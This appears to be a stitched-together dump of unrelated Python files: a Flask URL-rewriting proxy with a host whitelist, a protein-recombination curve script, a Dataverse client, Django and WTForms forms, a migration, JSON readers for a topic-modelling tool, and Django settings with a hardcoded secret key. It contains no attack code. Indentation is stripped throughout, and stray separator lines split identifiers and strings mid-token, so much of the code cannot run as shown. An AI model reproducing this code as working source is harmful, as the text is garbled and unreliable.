messages_file_parsed = urlparse.ParseResult(scheme = parsed.scheme, netloc = parsed.netloc, path = new_path, params = '', query = '', fragment = '')
return messages_file_parsed.geturl()
def make_url_absolute(relative_path, url):
if relative_path.startswith(('http://', 'https://')):
return relative_path
return extract_base_url(url) + relative_path
SRC_RELATIVE_REGEXP = re.compile(r"""(<\s*(?!ng-[^<>]*)[^<>]*\s(src|href)\s*=\s*"?'?)(?!http://|https://|//|/|#|"|"#|'|'#| i)""")
SRC_ABSOLUTE_REGEXP = re.compile(r"""(<\s*(?!ng-[^<>]*)[^<>]*\s(src|href)\s*=\s*"?'?)(?!http://|https://|//|#|"|"#|'|'#| i)""")
URL_ABSOLUTE_REGEXP = re.compile(r"""([: ]url\()/""")
def inject_absolute_urls(output, url):
#
# e.g., /bar/foo.html contains
# /bar/scripts/script.js which references to "image/foo.jpg'
#
# Then, we actually want /bar/image/foo.jpg and not /bar/scripts/image/foo.jpg
#
if url.endswith('.js') and request.referrer:
base_url = extract_base_url(request.referrer)
else:
base_url = extract_base_url(url)
absolute_url = 'http://{}'.format(urlparse.urlparse(url).netloc)
scheme = 'https' if current_app.config.get('PROXY_HTTPS') else 'http'
absolute_proxied_url = url_for('.proxy', url=absolute_url, _external=True, _scheme=scheme)
relative_proxied_url = url_for('.proxy', url=base_url, _external=True, _scheme=scheme)
output_lines = output.split('\n')
for line in output_lines:
line =
|
SRC_RELATIVE_REGEXP.sub(r"\1%s" % relative_proxied_url, line)
line = SRC_ABSOLUTE_REGEXP.sub(r"\1%s" % absolute_proxied_url, line)
if '.css' in url:
line = URL_ABSOLUTE_REGEXP.sub(r"\1%s/" % absolute_proxied_url, line)
output = '\n'.join(output_lines)
return output
def replace_links(block, url):
|
block = inject_absolute_urls(block, url)
return block
def generate(req, url):
pending_data = ""
for chunk in req.iter_content(chunk_size=1024):
current_block = pending_data + chunk
unfinished = False
for unfinished_regexp in unfinished_regexps:
if unfinished_regexp.match(current_block):
unfinished = True
if unfinished:
pending_data = current_block
continue
# It is finished. Replace all
current_block = replace_links(current_block, url)
yield current_block
pending_data = ""
ALLOWED_HOSTS = None
ALLOWED_HOSTS_LAST_UPDATE = 0 # Epoch
def get_allowed_hosts():
global ALLOWED_HOSTS
global ALLOWED_HOSTS_LAST_UPDATE
EXPIRATION = 60 # 1 minute
if time.time() - ALLOWED_HOSTS_LAST_UPDATE < EXPIRATION: # Less than a minute? Check
return ALLOWED_HOSTS
# Check list of allowed hosts
allowed_hosts = [ ah.url for ah in db.session.query(AllowedHost).all() ]
allowed_hosts = [ allowed_host for allowed_host in allowed_hosts if 'localhost' not in allowed_host and '127.0.' not in allowed_host and '192.168' not in allowed_host and '::1' not in allowed_host ]
ALLOWED_HOSTS = allowed_hosts
return ALLOWED_HOSTS
@proxy_blueprint.route('/<path:url>')
def proxy(url):
if not url.startswith('http://'):
return "Invalid protocol. Only http is supported -no https-.", 400
parsed = urlparse.urlparse(url)
if parsed.path == '':
url = url + '/'
allow_all = current_app.config.get('ALLOWED_HOSTS_ALL', False)
if not allow_all:
if parsed.netloc not in get_allowed_hosts():
return "URL domain not in the white list", abort(403)
request_headers = {}
for header in request.headers.keys():
if header in WHITELIST_REQUEST_HEADERS:
request_headers[header] = request.headers[header]
query_url = url
query_args = urlparse.urlparse(request.url).query
if query_args:
query_url = query_url + '?' + query_args
req = requests.get(query_url, stream = True, headers=request_headers)
content_type = req.headers.get('content-type')
if content_type:
kwargs = dict(content_type=content_type)
else:
kwargs = {}
response = Response(stream_with_context(generate(req, url)), status=req.status_code, **kwargs)
for header in WHITELIST_RESPONSE_HEADERS:
if header in req.headers.keys():
header_value = req.headers[header]
if header.lower() == 'location':
if header_value.startswith('/'):
scheme = 'https' if current_app.config.get('PROXY_HTTPS') else 'http'
header_value = url_for('.proxy', url='http://{}'.format(parsed.netloc), _external=True, _scheme=scheme) + header_value
response.headers[header] = header_value
for cookie in iter(req.cookies):
kwargs = {}
path = url_for('.proxy', url='http://{}'.format(parsed.netloc)) + cookie.path
if cookie.expires:
kwargs['expires'] = cookie.expires
response.set_cookie(key=cookie.name, value=cookie.value, path=path, **kwargs)
return response
@proxy_blueprint.route('/allowed-hosts/', methods=['GET', 'POST'])
def allowed_hosts():
if request.method == 'POST':
data = request.get_json(force=True, silent=True)
if request.headers.get('gw4labs-auth') != current_app.config.get('ALLOWED_HOSTS_CREDENTIAL', object()):
return "Invalid gw4labs-auth credentials", 403
# Valid app
valid_hosts = data['hosts']
valid_hosts = [ valid_host for valid_host in valid_hosts if valid_host and 'localhost' not in valid_host and '127.0.' not in valid_host and '192.168' not in valid_host and '::1' not in valid_host ]
processed_hosts = []
for ah in db.session.query(AllowedHost).all():
if ah.url in valid_hosts:
ah.update()
else:
db.session.delete(ah)
processed_hosts.append(ah.url)
for missing_host in set(valid_hosts).difference(set(processed_hosts)):
ah = AllowedHost(missing_host)
db.session.add(ah)
db.session.commit()
all_hosts = [ {
'url': ah.url,
'when': ah.last_update.strftime("%Y-%m-%d %H:%M:%S")
} for ah in db.session.query(AllowedHost).all() ]
return jsonify(hosts=all_hosts)
|
mattasmith/SCHEMA-RASPP | rasppcurve.py | Python | gpl-3.0 | 7,335 | 0.022904 |
#! /usr/local/bin/python
"""Script for producing a RASPP curve: the average disruption (energy)
and average mutation of libraries that have the lowest average energy
given constraints on fragment length.
******************************************************************
Copyright (C) 2005 Allan Drummond, California Institute of Technology
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
*******************************************************************
SCHEMA and RASPP were developed in the laboratory of Frances H. Arnold at the California Institute of Technology.
References:
Voigt, C. et al., "Protein building blocks preserved by recombination," Nature Structural Biology 9(7):553-558 (2002).
Meyer, M. et al., "Library analysis of SCHEMA-guided recombination," Protein Science 12:1686-1693 (2003).
Otey, C. et al., "Functional evolution and structural conservation in chimeric cytochromes P450: Calibrating a structure-guided approach," Chemistry & Biology 11:1-20 (2004)
Silberg, J. et al., "SCHEMA-guided protein recombination," Methods in Enzymology 388:35-42 (2004).
Endelman, J. et al., "Site-directed protein recombination as a shortest-path problem," Protein Engineering, Design & Selection 17(7):589-594 (2005).
"""
import sys, os, string, math, random, time
import pdb, schema, raspp
ARG_MULTIPLE_SEQUENCE_ALIGNMENT_FILE = 'msa'
ARG_CONTACT_FILE = 'con'
ARG_OUTPUT_FILE = 'o'
ARG_MIN_FRAGMENT_SIZE = 'min'
ARG_NUM_LIBRARIES = 'libs'
ARG_MAX_CHIMERAS_PER_LIBRARY = 'chims'
ARG_BIN_WIDTH = "bin"
ARG_NUM_CROSSOVERS = 'xo'
ARG_RANDOM_SEED = 'seed'
ARG_COMPARE = 'compare' # Unused
ARG_HELP = 'help'
def parse_arguments(args):
# Turn linear arguments into a dictionary of (option, [values,...]) pairs
arg_dict = {}
key = None
for arg in args[1:]:
if arg[0] == '-':
key = arg[1:]
else:
if arg_dict.has_key(key):
if arg_dict[key] is list:
arg_dict[key] = arg_dict[key]+[arg]
else:
arg_dict[key] = [arg_dict[key],arg]
else:
arg_dict[key] = arg
return arg_dict
def print_usage(args):
print 'Usage: python', args[0].split(os.path.sep)[-1], " [options]"
print "Options:\n", \
'\t-%s <alignment file>\n' % ARG_MULTIPLE_SEQUENCE_ALIGNMENT_FILE, \
"\t-%s <contact file>\n" % ARG_CONTACT_FILE, \
'\t-%s <# crossovers>\n' % ARG_NUM_CROSSOVERS, \
'\t[-%s <# libraries to generate>]\n' % ARG_NUM_LIBRARIES, \
'\t[-%s <random number seed>]\n' % ARG_RANDOM_SEED, \
'\t[-%s <max. chimeras generated per library>]\n' % ARG_MAX_CHIMERAS_PER_LIBRARY, \
'\t[-%s <min. fragment length>]\n' % ARG_MIN_FRAGMENT_SIZE, \
'\t[-%s <bin width>]\n' % ARG_BIN_WIDTH, \
'\t[-%s <output file>]' % ARG_OUTPUT_FILE
def confirm_arguments(arg_dict):
# Are arguments okay?
res = True
arg_keys = arg_dict.keys()
try:
if len(arg_keys) == 0:
res = False
return
if not ARG_MULTIPLE_SEQUENCE_ALIGNMENT_FILE in arg_keys:
print " You must provide a library file (-%s <alignment file>)" % ARG_MULTIPLE_SEQUENCE_ALIGNMENT_FILE
res = False
elif not os.path.isfile(arg_dict[ARG_MULTIPLE_SEQUENCE_ALIGNMENT_FILE]):
print " Can't find library file %s" % arg_dict[ARG_MULTIPLE_SEQUENCE_ALIGNMENT_FILE]
res = False
if not ARG_CONTACT_FILE in arg_keys:
print " You must provide a contact file (-%s <contact file>)" % ARG_CONTACT_FILE
res = False
elif not os.path.isfile(arg_dict[ARG_CONTACT_FILE]):
print " Can't find contact file %s" % arg_dict[ARG_CONTACT_FILE]
res = False
if not ARG_NUM_CROSSOVERS in arg_keys:
print " You must specify the number of crossovers (-%s <number of crossovers>)" % ARG_NUM_CROSSOVERS
res = False
except Exception, e:
#print e
res = False
return res
def main(args):
arg_dict = parse_arguments(args)
if not confirm_arguments(arg_dict):
if args[0].split(os.path.sep)[-1] == "rasppcurve.py":
print_usage(args)
return
# Flags and values
print_E = False
print_m = False
# Inputs:
# The alignment/fragment file name.
msa_file = arg_dict[ARG_MULTIPLE_SEQUENCE_ALIGNMENT_FILE]
# Read the alignment file to create a list of parents.
# The parents will appear in the list in the order in which they appear in the file.
parent_list = schema.readMultipleSequenceAlignmentFile(file(msa_file, 'r'))
parents = [p for (k,p) in parent_list]
# Get the contacts
pdb_contacts = schema.readContactFile(file(arg_dict[ARG_CONTACT_FILE], 'r'))
# Establish connection to output, either file or, if no output file is
# specified, to standard output.
if arg_dict.has_key(ARG_OUTPUT_FILE):
output_file = file(arg_dict[ARG_OUTPUT_FILE], 'w')
else:
output_file = sys.stdout
# Get the minimum fragment size.
if arg_dict.has_key(ARG_MIN_FRAGMENT_SIZE):
min_length = int(arg_dict[ARG_MIN_FRAGMENT_SIZE])
else:
output_file.write("# No minimum fragment length specified; using L=4.\n")
min_length = 4
# Get the bin width
if arg_dict.has_key(ARG_BIN_WIDTH):
bin_width = float(arg_dict[ARG_BIN_WIDTH])
else:
output_file.write("# No bin width specified; using bin width=1.0.\n")
bin_width = 1.0
# Get the number of fragments -- one more than the number of crossovers.
num_fragments = int(arg_dict[ARG_NUM_CROSSOVERS])+1
num_parents = len(parents)
library_size = num_parents**num_fragments
# Make libraries consistent with RASPP
(new_parents, identical_sites) = raspp.collapse_parents(parents)
if len(new_parents[0]) < num_fragments*min_length:
error_msg = "Minimum fragment length of %d is too large.\n%d " + \
"fragments with length %d cannot be found in a " + \
|
"sequence of length %d (with identities removed). Aborting..."
print error_msg % (min_length, num_fragments, min_length, len(parents[0]))
return
contacts = schema.getSCHEMAContacts(pdb_contacts, parents)
energies = raspp.make_4d_energies(contacts, parents)
avg_energies = raspp.calc_average_energies(energies, parents)
tstart = time.clock()
res = raspp.RASPP(avg_energies, parents, num_fragments-1, min_length)
output_file.write("# RASPP took
|
%1.2f secs\n" % (time.clock()-tstart,))
output_file.write("# RASPP found %d results\n" % (len(res),))
tstart = time.clock()
curve = raspp.curve(res, parents, bin_width)
output_file.write("# RASPP found %d unique (<E>,<m>) points\n" % (len(curve),))
output_file.write("# RASPP curve took %1.2f secs\n" % (time.clock()-tstart,))
output_file.write("# <E>\t<m>\tcrossover points\n")
for (average_E, average_m, crossovers) in curve:
xover_pat = '%d '*len(crossovers)
xover_str = xover_pat % tuple(crossovers)
output_file.write('%1.4f\t%1.4f\t%s\n' % (average_E, average_m, xover_str))
if arg_dict.has_key(ARG_OUTPUT_FILE):
output_file.close()
def main_wrapper():
main(sys.argv)
main_wrapper()
|
aaxelb/osf.io | addons/dataverse/client.py | Python | apache-2.0 | 3,545 | 0.001975 |
import httplib as http
from dataverse import Connection
from dataverse.exceptions import ConnectionError, UnauthorizedError, OperationFailedError
from framework.exceptions import HTTPError
from addons.dataverse import settings
from website.util.sanitize import strip_html
def _connect(host, token):
try:
return Connection(host, token)
except ConnectionError:
return None
def connect_from_settings(node_settings):
if not (node_settings and node_settings.external_account):
return None
host = node_settings.external_account.oauth_key
token = node_settings.external_account.oauth_secret
try:
return _connect(host, token)
except UnauthorizedError:
return None
def connect_or_error(host, token):
try:
connection = _connect(host, token)
if not connection:
raise HTTPError(http.SERVICE_UNAVAILABLE)
return connection
except UnauthorizedError:
raise HTTPError(http.UNAUTHORIZED)
def connect_from_settings_or_401(node_settings):
if not (node_settings and node_settings.external_account):
return None
host = node_settings.external_account.oauth_key
token = node_settings.external_account.oauth_secret
return connect_or_error(host, token)
def get_files(dataset, published=False):
version = 'latest-published' if published else 'latest'
return dataset.get_files(version)
def publish_dataverse(dataverse):
try:
dataverse.publish()
except OperationFailedError:
raise HTTPError(http.BAD_REQUEST)
def publish_dataset(dataset):
if dataset.get_state() == 'RELEASED':
raise HTTPError(http.CONFLICT, data=dict(
message_short='Dataset conflict',
message_long='This version of the dataset has already been published.'
))
if not dataset.dataverse.is_published:
raise HTTPError(http.METHOD_NOT_ALLOWED, data=dict(
message_short='Method not allowed',
message_long='A dataset cannot be published until its parent Dataverse is published.'
))
try:
dataset.publish()
except OperationFailedError:
raise HTTPError(http.BAD_REQUEST)
def get_datasets(dataverse):
if dataverse is None:
return []
return dataverse.get_datasets(timeout=settings.REQUEST_TIMEOUT)
def get_dataset(dataverse, doi):
if dataverse is None:
return
dataset = dataverse.get_dataset_by_doi(doi, timeout=settings.REQUEST_TIMEOUT)
try:
if dataset and dataset.get_state() == 'DEACCESSIONED':
raise HTTPError(http.GONE, data=dict(
message_short='Dataset deaccessioned',
message_long='This dataset has been deaccessioned and can no longer be linked to the OSF.'
))
return dataset
except UnicodeDecodeError:
raise HTTPError(http.NOT_ACCEPTABLE, data=dict(
message_short='Not acceptable',
messag
|
e_long='This dataset cannot be connected due to forbidden '
'characters in one or more of the file names.'
))
def get_dataverses(connection):
if connection is None:
return []
return connection.get_dataverses()
def get_dataverse(connection, alias):
if connection is None:
return
return connection.get_dataverse(alias)
def ge
|
t_custom_publish_text(connection):
if connection is None:
return ''
return strip_html(connection.get_custom_publish_text(), tags=['strong', 'li', 'ul'])
|
sahilshekhawat/ApkDecompiler | javadecompiler/Krakatau/ssa/excepttypes.py | Python | gpl-2.0 | 368 | 0.005435 |
#common exception types
ArrayOOB = 'java/lang/ArrayIndexOutOfBoundsException', 0
ArrayStore = 'java/lang/ArrayStoreException', 0
ClassCast = 'java/lang/ClassCastException', 0
MonState = 'java/lang/IllegalMonitorStateException', 0
NegArrSize = 'java/lang/NegativeArraySizeException', 0
NullPtr = 'java/lang/Nu
|
llPointerException', 0
|
OOM = 'java/lang/OutOfMemoryError', 0
|
thoas/django-fairepart | fairepart/forms.py | Python | mit | 787 | 0.002541 |
from django import forms
from django.utils.translation import ugettext_lazy as _
from .models import Invitation
class InvitationForm(forms.ModelForm):
class Meta:
model = Invitation
fields = ('email', 'text')
def __init__(self, *args,
|
**kwargs):
self.user = kwargs.pop('user', None)
super(InvitationForm, self).__init__(*args, **kwargs)
def clean_email(self):
email = self.cleaned_data['email']
if Invitation.objects.filter(from_user=self.user, email=email).exists():
raise forms.ValidationError(_('An invitation for %s already exist') % email)
|
return email
def save(self, *args, **kwargs):
self.instance.from_user = self.user
super(InvitationForm, self).save(*args, **kwargs)
|
roninio/gae-boilerplate | boilerplate/forms.py | Python | lgpl-3.0 | 5,505 | 0.00545 |
"""
Created on June 10, 2012
@author: peta15
"""
from wtforms import fields
from wtforms import Form
from wtforms import validators
from lib import utils
from webapp2_extras.i18n import lazy_gettext as _
from webapp2_extras.i18n import ngettext, gettext
FIELD_MAXLENGTH = 50 # intended to stop maliciously long input
class FormTranslations(object):
def gettext(self, string):
return gettext(string)
def ngettext(self, singular, plural, n):
return ngettext(singular, plural, n)
class BaseForm(Form):
def __init__(self, request_handler):
super(BaseForm, self).__init__(request_handler.request.POST)
def _get_translations(self):
return FormTranslations()
# ==== Mixins ====
class PasswordConfirmMixin(BaseForm):
password = fields.TextField(_('Password'), [validators.Required(),
validators.Length(max=FIELD_MAXLENGTH, message=_(
"Field cannot be longer than %(max)d characters."))])
c_password = fields.TextField(_('Confirm Password'),
[validators.Required(), validators.EqualTo('password', _('Passwords must match.')),
validators.Length(max=FIELD_MAXLENGTH,
message=_("Field cannot be longer than %(max)d characters."))])
class UsernameMixin(BaseForm):
username = fields.TextField(_('Username'), [validators.Required(),
validators.Length(max=FIELD_MAXLENGTH, message=_(
"Field cannot be longer than %(max)d characters.")),
validators.regexp(utils.EMAIL_REGEXP, message=_(
"Username / Email invalid."))])
class NameMixin(BaseForm):
name = fields.TextField(_('Name'), [
validators.Length(max=FIELD_MAXLENGTH, message=_("Field cannot be longer than %(max)d characters.")),
validators.regexp(utils.NAME_LASTNAME_REGEXP, message=_(
"Name invalid. Use only letters and numbers."))])
last_name = fields.TextField(_('Last Name'), [
validators.Length(max=FIELD_MAXLENGTH, message=_("Field cannot be longer than %(max)d characters.")),
|
validators.regexp(utils.NAME_LASTNAME_REGEXP, message=_(
"Last Name invalid. Use only letters and numbers."))])
class EmailMixin(BaseForm):
email = fields.TextField(_('Email'), [validators.Required(),
validators.Length(min=8, max=FIELD_MAXLENGTH, message=_(
|
"Field must be between %(min)d and %(max)d characters long.")),
validators.regexp(utils.EMAIL_REGEXP, message=_('Invalid email address.'))])
# ==== Forms ====
class PasswordResetCompleteForm(PasswordConfirmMixin):
pass
class LoginForm(UsernameMixin):
password = fields.TextField(_('Password'), [validators.Required(),
validators.Length(max=FIELD_MAXLENGTH, message=_(
"Field cannot be longer than %(max)d characters."))],
id='l_password')
pass
class ContactForm(EmailMixin):
name = fields.TextField(_('Name'), [validators.Required(),
validators.Length(max=FIELD_MAXLENGTH, message=_(
"Field cannot be longer than %(max)d characters.")),
validators.regexp(utils.NAME_LASTNAME_REGEXP, message=_(
"Name invalid. Use only letters and numbers."))])
message = fields.TextAreaField(_('Message'), [validators.Required(), validators.Length(max=65536)])
pass
class RegisterForm(PasswordConfirmMixin, UsernameMixin, NameMixin, EmailMixin):
country = fields.SelectField(_('Country'), choices=[])
tz = fields.SelectField(_('Timezone'), choices=[])
pass
class EditProfileForm(UsernameMixin, NameMixin):
country = fields.SelectField(_('Country'), choices=[])
tz = fields.SelectField(_('Timezone'), choices=[])
pass
class EditPasswordForm(PasswordConfirmMixin):
current_password = fields.TextField(_('Password'), [validators.Required(),
validators.Length(max=FIELD_MAXLENGTH, message=_(
"Field cannot be longer than %(max)d characters."))])
pass
class EditEmailForm(BaseForm):
new_email = fields.TextField(_('Email'), [validators.Required(),
validators.Length(min=8, max=FIELD_MAXLENGTH, message=_(
"Field must be between %(min)d and %(max)d characters long.")),
validators.regexp(utils.EMAIL_REGEXP,
message=_('Invalid email address.'))])
password = fields.TextField(_('Password'), [validators.Required(),
validators.Length(max=FIELD_MAXLENGTH, message=_(
"Field cannot be longer than %(max)d characters."))])
pass
|
biddellns/litsl | season/migrations/0004_groupround_schedule_is_set.py | Python | gpl-3.0 | 464 | 0 |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-12-06 02:31
from __future__ import unicode_
|
literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('season', '0003_auto_20161206_0216'),
]
operations = [
migrations.AddField(
model_name='groupround',
|
name='schedule_is_set',
field=models.BooleanField(default=False),
),
]
|
kcompher/topik | topik/readers.py | Python | bsd-3-clause | 15,758 | 0.004823 |
from __future__ import absolute_import, print_function
import os
import logging
from topik.intermediaries.raw_data import output_formats
# imports used only for doctests
from topik.tests import test_data_path
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s',
level=logging.INFO)
def _iter_document_json_stream(filename, json_prefix=None):
"""Iterate over a json stream of items and get the field that contains the text to process and tokenize.
Parameters
----------
filename: string
The filename of the json stream.
>>> documents = _iter_document_json_stream(
... '{}/test_data_json_stream.json'.format(test_data_path))
>>> next(documents) == {
... u'doi': u'http://dx.doi.org/10.1557/PROC-879-Z3.3',
... u'title': u'Sol Gel Preparation of Ta2O5 Nanorods Using DNA as Structure Directing Agent',
... u'url': u'http://journals.cambridge.org/action/displayAbstract?fromPage=online&aid=8081671&fulltextType=RA&fileId=S1946427400119281.html',
... u'abstract': u'Transition metal oxides are being considered as the next generation materials in field such as electronics and advanced catalysts; between them is Tantalum (V) Oxide; however, there are few reports for the synthesis of this material at the nanometer size which could have unusual properties. Hence, in this work we present the synthesis of Ta2O5 nanorods by sol gel method using DNA as structure directing agent, the size of the nanorods was of the order of 40 to 100 nm in diameter and several microns in length; this easy method can be useful in the preparation of nanomaterials for electronics, biomedical applications as well as catalysts.',
... u'filepath': u'abstracts/879/http%3A%2F%2Fjournals.cambridge.org%2Faction%2FdisplayAbstract%3FfromPage%3Donline%26aid%3D8081671%26fulltextType%3DRA%26fileId%3DS1946427400119281.html',
... u'filename': '{}/test_data_json_stream.json'.format(test_data_path),
... u'vol': u'879',
... u'authors': [u'Humberto A. Monreala', u' Alberto M. Villafa\xf1e',
... u' Jos\xe9 G. Chac\xf3n', u' Perla E. Garc\xeda',
... u'Carlos A. Mart\xednez'],
... u'year': u'1917'}
True
"""
import json
with open(filename, 'r') as f:
for n, line in enumerate(f):
try:
output = json.loads(line)
output["filename"] = filename
yield output
except ValueError as e:
logging.debug("Unable to process line: {} (error was: {})".format(str(line), e))
raise
def __is_iterable(obj):
try:
iter(obj)
except TypeError, te:
return False
return True
def _test_json_input(fi
|
lename):
return next(_iter_document_json_stream(filename))
def _iter_large_json(filename, json_prefix='item'):
# TODO: add the script to automatically find the json_prefix based on a key
# Also should still have the option to manually specify a prefix for complex
# json structures.
"""Iterate over all items and sub-items in a json object that match the specified
|
prefix
Parameters
----------
filename: string
The filename of the large json file
json_prefix: string
The string representation of the hierarchical prefix where the items of
interest may be located within the larger json object.
Try the following script if you need help determining the desired prefix:
$ import ijson
$ with open('test_data_large_json_2.json', 'r') as f:
$ parser = ijson.parse(f)
$ for prefix, event, value in parser:
$ print("prefix = '%r' || event = '%r' || value = '%r'" %
$ (prefix, event, value))
>>> documents = _iter_large_json(
... '{}/test_data_large_json.json'.format(test_data_path),
... json_prefix='item._source.isAuthorOf')
>>> next(documents) == {
... u'a': u'ScholarlyArticle',
... u'name': u'Path planning and formation control via potential function for UAV Quadrotor',
... u'author': [
... u'http://dig.isi.edu/autonomy/data/author/a.a.a.rizqi',
... u'http://dig.isi.edu/autonomy/data/author/t.b.adji',
... u'http://dig.isi.edu/autonomy/data/author/a.i.cahyadi'],
... u'text': u"Potential-function-based control strategy for path planning and formation " +
... u"control of Quadrotors is proposed in this work. The potential function is " +
... u"used to attract the Quadrotor to the goal location as well as avoiding the " +
... u"obstacle. The algorithm to solve the so called local minima problem by utilizing " +
... u"the wall-following behavior is also explained. The resulted path planning via " +
... u"potential function strategy is then used to design formation control algorithm. " +
... u"Using the hybrid virtual leader and behavioral approach schema, the formation " +
... u"control strategy by means of potential function is proposed. The overall strategy " +
... u"has been successfully applied to the Quadrotor's model of Parrot AR Drone 2.0 in " +
... u"Gazebo simulator programmed using Robot Operating System.\\nAuthor(s) Rizqi, A.A.A. " +
... u"Dept. of Electr. Eng. & Inf. Technol., Univ. Gadjah Mada, Yogyakarta, Indonesia " +
... u"Cahyadi, A.I. ; Adji, T.B.\\nReferenced Items are not available for this document.\\n" +
... u"No versions found for this document.\\nStandards Dictionary Terms are available to " +
... u"subscribers only.",
... u'uri': u'http://dig.isi.edu/autonomy/data/article/6871517',
... u'datePublished': u'2014',
... 'filename': '{}/test_data_large_json.json'.format(test_data_path)}
True
"""
from ijson import items
with open(filename, 'r') as f:
for item in items(f, json_prefix):
if hasattr(item, 'keys'): # check if item is a dictionary
item['filename'] = filename
yield item
# check if item is both iterable and not a string
elif __is_iterable(item) and not isinstance(item, str):
for sub_item in item:
# check if sub_item is a dictionary
if hasattr(sub_item, 'keys'):
sub_item['filename'] = filename
yield sub_item
else:
raise ValueError("'item' in json source is not a dict, and is either a string or not iterable: %r" % item)
def _iter_documents_folder(folder, content_field='text'):
"""Iterate over the files in a folder to retrieve the content to process and tokenize.
Parameters
----------
folder: string
The folder containing the files you want to analyze.
content_field: string
The usage of 'content_field' in this source is different from most other sources. The
assumption in this source is that each file contains raw text, NOT dictionaries of
categorized data. The content_field argument here specifies what key to store the raw
text under in the returned dictionary for each document.
$ ls ./topik/tests/data/test_data_folder_files
doc1 doc2 doc3
>>> documents = _iter_documents_folder(
... '{}/test_data_folder_files'.format(test_data_path))
>>> next(documents)['text'] == (
... u"'Interstellar' was incredible. The visuals, the score, " +
... u"the acting, were all amazing. The plot is definitely one " +
... u"of the most original I've seen in a while.")
True
"""
import gzip
if not os.path.exists(folder):
raise IOError("Folder not found!")
for directory, subdirectories, files in os.walk(folder):
for n, file in enumerate(sorted(files)):
_open = gzip.open if file.endswith('.gz') else open
try:
fullpath = os.path.join(directory, file)
with _open(fullpath, 'rb') as f:
yield {content_field: f.read(
|
shaunsephton/holodeck
|
holodeck/django_settings.py
|
Python
|
bsd-3-clause
| 5,258
| 0.000761
|
from holodeck.settings import *
import os
import sys
# Django settings for Holodeck project.
PATH = os.path.split(os.path.abspath(os.path.join(os.path.dirname(sys.argv[0]))))[0]
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', 'your_email@example.com'),
)
MANAGERS = ADMINS
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = False
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = os.path.join(PATH, 'media')
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = '/media/'
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = os.path.join(PATH, 'static')
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/st
|
atic" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.sta
|
ticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'nj1p6t#2(fe(e=e_96o05fhti6p#@^mwaqioq=(f(ma_unqvt='
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
TEMPLATE_CONTEXT_PROCESSORS = (
"django.contrib.auth.context_processors.auth",
"django.core.context_processors.debug",
"django.core.context_processors.i18n",
"django.core.context_processors.media",
"django.core.context_processors.request",
"django.core.context_processors.static",
"django.core.context_processors.tz",
"django.contrib.messages.context_processors.messages"
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# Uncomment the next line for simple clickjacking protection:
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'holodeck.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'holodeck.wsgi.application'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.admin',
'holodeck',
)
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
|
jarble/EngScript
|
libraries/polishNotation.py
|
Python
|
mit
| 14,320
| 0.023673
|
#The new version is in polishNotation2.py. Use that version instead of using this version.
#To do:
#Find out how to split a string using matches of a regular expression as the separator.
